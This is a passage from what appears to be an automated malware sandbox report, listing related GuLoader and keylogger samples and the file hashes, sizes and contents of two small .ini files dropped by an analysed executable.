                                                                                                                            C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dllBtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                Steel Sample- QUOTE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  Steel Sample- QUOTE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    Skambenets.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      Skambenets.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        Marcom Trade SS-04665.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                          Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            SecuriteInfo.com.FileRepMalware.23885.29286.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              SecuriteInfo.com.FileRepMalware.24375.4894.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\Public\Desktop\Varda.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\GBYfjUz4a5.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33
                                                                                                                                                Entropy (8bit):4.33197669498491
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:U4ooQGRDWh:hooQh
                                                                                                                                                MD5:340AD700CF73B73EA2313C044D40EA9A
                                                                                                                                                SHA1:9B90CC3147D140FA936E308C2C320BDC385DA93A
                                                                                                                                                SHA-256:55A2B8F5EF1D17023FD8245E69830CC961C0CE629EDDC7AC1043C288CB3915B5
                                                                                                                                                SHA-512:4B31D10B80AE71197AC367C868569949224A4CD542BF0E9C188B816348EC8958F952525F939C827BDDC8610F268DD12E310D6D2FC99071C741B3A38E062542B4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:[Chocho240]..struct=finkulturel..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\Alpha.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\GBYfjUz4a5.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47
                                                                                                                                                Entropy (8bit):4.628848957968553
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:YOm45GXQLQIfLBJXmgxv:5TGXQkIP2I
                                                                                                                                                MD5:B895D576D6637A778B387B2FCA0F56EC
                                                                                                                                                SHA1: